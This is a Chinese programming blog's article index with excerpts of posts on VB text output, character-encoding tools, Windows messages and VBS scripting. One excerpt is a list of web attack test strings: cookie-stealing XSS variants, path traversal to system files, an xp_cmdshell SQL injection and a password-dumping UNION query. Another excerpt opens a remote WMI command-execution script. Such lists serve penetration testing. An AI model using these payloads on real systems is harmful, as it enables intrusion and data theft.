文章列表

[HOOK]基本知识总结

, ,
原文找不到了,类似:https://www.cnblogs.com/rosesmall/p/3248300.html 阅读全文

[vb]TextOut例子

, ,
[vb]TextOut例子 Option Explicit Private Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long Private Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal x As Long, ByVal y As Long, ByVal lpString As String, ByVal nCount As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal 阅读全文

[工具]汉字转换

, ,
一个汉字转换的工具。支持GB,GBK,Unicode转换,支持多个字符列表输出。 阅读全文

[vb]转换区位码到汉字

, , ,
转换区位码到汉字 阅读全文

[vb]获得汉字的区位码

, , ,
获得汉字的区位码 CSDN:Hassle原创 阅读全文

[XSS]跨站测试语句总结

, ,
[XSS]跨站测试语句总结 '><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <img src="javascript:alert('XSS')"> %0a%0a<script>alert(\"Vulnerable\")</script>.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp &lt;script&gt;alert('Vulnerable');&lt;/script&gt <script>alert('Vulnerable')</script> ?sql_debug=1 a%5c.aspx a.jsp/<script>alert('Vulnerable')</script> a/ a?<script>alert('Vulnerable')</script> "><script>alert('Vulnerable')</script> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG 阅读全文

[API]Windows消息大全

, , ,
转载自:https://blog.csdn.net/vbend/article/details/266292 阅读全文

[VBS]通过135端口执行命令

, , ,
[VBS]通过135端口执行命令 set objectA=createobject("wbemscripting.swbemlocator") set objectB=objectA.connectserver("IP地址","r 阅读全文

[VBS]依赖文件

, ,
VBS依赖的文件scrrun.dll, WSHom.Ocx,shell32.dll如果一些涉及 Wscript.shell ,Scripting.FileSystemObject等方面的脚本无法正常运行,很有可能是系统关闭了此三个文件,可以通过如下命令逐一进行注册。 阅读全文

[VBS]搜索文件

, ,
VBS搜索文件 阅读全文